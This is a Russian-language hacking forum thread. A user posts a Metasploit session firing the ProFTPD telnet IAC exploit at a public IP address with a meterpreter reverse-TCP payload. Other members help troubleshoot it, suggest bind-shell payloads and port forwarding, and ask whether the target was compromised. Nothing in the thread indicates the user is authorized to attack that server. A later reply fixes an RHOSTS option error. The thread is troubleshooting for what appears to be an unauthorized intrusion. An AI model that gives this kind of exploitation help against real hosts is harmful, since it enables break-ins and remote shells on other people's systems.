Просмотр полной версии : Metasploit
Что не так?
Code:
msf > use linux/ftp/proftp_telnet_iac
msf exploit(proftp_telnet_iac) > set RHOST 213.239.235.179
RHOST => 213.239.235.179
msf exploit(proftp_telnet_iac) > set RPORT 21
RPORT => 21
msf exploit(proftp_telnet_iac) > set TARGET 0
TARGET => 0
msf exploit(proftp_telnet_iac) > set PAYLOAD linux/x86/meterpreter/reverse_tcp PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(proftp_telnet_iac) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf exploit(proftp_telnet_iac) > exploit
Started reverse handler on 192.168.1.4:4444
Automatically detecting the target...
FTP Banner: 220 ProFTPD 1.3.3a Server (Debian) [::ffff:213.239.235.179]
Selected Target: ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1
msf exploit(proftp_telnet_iac) >
И всё((
Вам точно нужен reverse-tcp? По возможности используется что-то более прямое.
По вероятности:
1) Целевая версия таки не уязвима
2) Цель уязвима, но не может законнектиться к вам.
Нет, версия точно уязвима(если не пропатчена конечно,в чем я сомневаюсь), и есть ли спобоб исправить пункт 2?
Спасибо.
nike001 said:
Нет, версия точно уязвима(если не пропатчена конечно,в чем я сомневаюсь), и есть ли спобоб исправить пункт 2?
Спасибо.
Судя по баннеру, да, уязвима. Но баннер - это всего лишь баннер.
Насколько я помню, в этом сплойте нет ограничений на тип пейлоада, поэтому используйте любой другой из доступных, где цели не нужно коннектиться к вам.
madhatter said:
Судя по баннеру, да, уязвима. Но баннер - это всего лишь баннер.
Насколько я помню, в этом сплойте нет ограничений на тип пейлоада, поэтому используйте любой другой из доступных, где цели не нужно коннектиться к вам.
Спасибо. Хоть кто-то здесь разбирается не только в скулях и xss-ках.
nike001 said:
Спасибо. Хоть кто-то здесь разбирается не только в скулях и xss-ках.
Np. Так вы расскажите, поломалась цель?
madhatter said:
Np. Так вы расскажите, поломалась цель?
Сейчас буду пробовать. Позже отпишусь.
И shell_bind_tcp, и bind_tcp тоже не работают.
P.S. Если есть у кого киньте ссылку про payloads(виды, и для чего каждый служит)
infoseller
15.03.2014, 14:17
А хэндлер-то запущен? и должен быть проброс в локалку...
За все время ни одного хоста с рабочей багой не попадалось, остается собирать на локалке и проверять. 2ТС, скорее всего патченная.
infoseller said:
А хэндлер-то запущен? и должен быть проброс в локалку...
Code:
Started reverse handler on 192.168.1.4:4444
Ну на сколько я понимаю хэндлер запущен и проброс в локалку тоже есть.
После того как я запускаю сплойт появляется вот эта строка
Code:
msf exploit(proftp_telnet_iac) >
и консоль зависает, т.е. ничего нельзя ввести, Ctrl+c и Ctrl+x ничего не работает.
Никто что ли не знает, почему не работает?
madhatter said:
↑ (https://antichat.live/posts/3689660/)
Вам точно нужен reverse-tcp? По возможности используется что-то более прямое.
По вероятности:
1) Целевая версия таки не уязвима
2) Цель уязвима, но не может законнектиться к вам.
Вижу шаришь))Помоги разобраться.Проблема в том что эксплоит требует опцию RHOST в основном это IP но при вводе пишет (Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS ) опция RHOST (The target address range or CIDR identifier) cпасиб за ранее.
Leo2016 said:
↑ (https://antichat.live/posts/3945709/)
Вижу шаришь))Помоги разобраться.Проблема в том что эксплоит требует опцию RHOST в основном это IP но при вводе пишет (Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS ) опция RHOST (The target address range or CIDR identifier) cпасиб за ранее.
Будьте внимательнее в следующий раз , ошибка новичков там написано RHOSTS а не RHOST
http://www.blackmoreops.com/2014/01...-following-options-failed-to-validate-rhosts/ (http://www.blackmoreops.com/2014/01/09/fix-metasploit-error-following-options-failed-to-validate-rhosts/)
grimnir said:
↑ (https://antichat.live/posts/3945827/)
Будьте внимательнее в следующий раз , ошибка новичков там написано RHOST
S а не RHOST
http://www.blackmoreops.com/2014/01...-following-options-failed-to-validate-rhosts/ (http://www.blackmoreops.com/2014/01/09/fix-metasploit-error-following-options-failed-to-validate-rhosts/)
Вот черт спасибо большое)))И правда)))Держи лапу))))
nikbim96
15.02.2016, 04:33
Ты ломаешь его в локальной сети?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot